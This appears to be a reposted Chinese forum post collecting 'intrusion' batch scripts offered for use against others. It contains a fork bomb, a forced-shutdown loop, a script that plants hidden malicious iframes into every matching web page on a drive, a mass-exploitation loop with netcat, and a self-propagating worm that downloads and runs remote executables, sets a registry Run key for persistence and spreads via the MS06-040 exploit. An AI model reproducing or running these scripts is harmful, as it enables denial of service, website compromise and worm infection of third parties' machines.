几个恶心的批处理

几个恶心的批处理
 
转载请注明出自雨林木风 bbs.ylmf. 鉴于大家最近都很关注批处理,特地从网上找来一点,大家有好的可以在后面跟!!
各种入侵批处理
第一个 : 让别人内存 OVER( 逼他重启 )
@echo off
start cmd
%0

就这 3 行了


第二个 : 让对方重启指定次数 ( 害人专用 )
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启 5 次后不在重启


第三个 : 自动踢人 (3389 肉机保护自己专用 )
@echo off
logoff 1
del log.bat
logoff
后面的 1 改成自己登陆的 ID , query user 查看


第四个 : 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用 NC 监听端口 , 多开几个 , 然后指行 , 就自动溢出了



第五个 : 自动挂马改主页
@echo off
cls
rem
直接打批处理名字就有帮助
title
批量挂马 , 改首页
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "%dai%"=="" goto e1
if "%dai%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path"
echo.
echo
代码全部插入完毕 !!!!
echo.
pause
goto e1
:u1
echo
您现在的操作将使 %pan% 盘下 , 全部名为 %ye% 的内容变为您要更改的内容 .
echo
这将是非常危险的 , 您真的要这样做 ? 回车却认 ,Ctrl+c 取消操作 .
pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
echo.
echo
首页全部更改完必 !!!! 如果您发现没有替换成功 , 请将 %ye% 文件只读属性去掉 .
echo.
pause
:e1
echo.
echo
本批处理只适用于 2003 系统 , 其他系统要使用 , 请将 forfiles.exe 拷贝至系统盘 system32 目录下
echo
用法 :snj ^< 搜索盘符 ^> ^< 文件名 ^> ^< 网马地址 ^>
echo
例子 :snj d:\ index.asp [url]www.muma.com/mm.htm[/url]
echo
批处理将自动添加 ^<iframe^> 标记
echo.
echo
如果您要更改全部网站的首页 ! 请在批处理文件所在目录下 , 新建一个名为 htm.txt 的文本文件 .
echo
然后将要更改的代码加 COPY 到里面保存 . 然后将命令的 ^< 网马地址 ^> 项输入为 htm.txt 即可 .
echo
例子 :snj d:\ index.asp htm.txt
echo.
echo
为了能准确无误执行批处理请最好先把记事本的 " 自动换行功能去掉 ", 让命令保持在一行才能正确执行 .
echo.
echo
使用此批处理造成一切后果本人概不负责 , 请大家谨慎使用 !
echo.



第六个 : 利用批处理编写利用系统漏洞传播的蠕虫病毒
del c:\42.exe
del c:\nc.exe
del c:\ip.exe
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("W..Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
echo dim wsh > %systemroot%\help\test2.vbs
echo set wsh=CreateObject("W..Shell") >> %systemroot%\help\test2.vbs
echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs
echo open 10.0.0.5 > %systemroot%\help\ftp.txt
echo open myyes >> %systemroot%\help\ftp.txt
echo 1 >> %systemroot%\help\ftp.txt
echo binary >> %systemroot%\help\ftp.txt
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
echo bye >> %systemroot%\help\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
echo "SKYNET Personal FireWall"="F:\\
系统安全工具 \\FireWall\\PFW.exe" >> %systemroot%\help\1.reg
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg

if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
regedit -s %systemroot%\help\1.reg
ftp -s:%systemroot%\help\ftp.txt
move c:\nc.exe %systemroot%\help\ /y
move c:\42.exe %systemroot%\help\ /y
move c:\ip.exe %systemroot%\help\ /y
%systemroot%\help\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
准备 :
1:
找一个反向连接的溢出攻击程序 , ms06040 漏洞
2:
找呀一个免费 FTP 空间 , 最好是送域名的
3:
利用你所知道的高级语言编写一个 , 能生成随机范围 IP 地址和找到本机 IP 的工具 .
思路 :
for 语句对指定文本里的 IP 进行溢出 , 然后用 if 语句判断是否溢出成功 , 如果成功开启一个 NC 监听端口 ,NC 后面带一个 < 输入符号
输入的内容为下载本批处理文件 , 然后执行这个批处理 . 这样被溢出的机器就又会在他那里运行我门的批处理 , 从而到自动传播的目的 .

把批处理生成的文件集中放到一个目录下 , 可以 %systemroot% 系统变量直接放到系统目录下
因为批处理运行后会闪出命令行窗口 , 我门可以利用 VBS 脚本来运行我们的批处理 , 这样就不会有任何窗口出现 , 脚本如下
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("W..Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs

生成随机 IP 工具的 VB 代码
Private Sub Form_Load()
Dim fso As New FileSystemObject
Dim a, b, c, d As Integer
Dim ph, e As String
ph = App.Path & "\" & "ip.txt"
Randomize
a = Int(253 * Rnd + 1)
b = Int(253 * Rnd + 1)
c = Int(240 * Rnd + 1)
Open ph For Output As #1
For i = c To c + 7
For j = 1 To 254
e = a & "." & b & "." & i & "." & j
Print #1, e
DoEvents
Next j
Next i
Close #1
Unload Me
End Sub

你可能感兴趣的:(职场,批处理,休闲,恶心)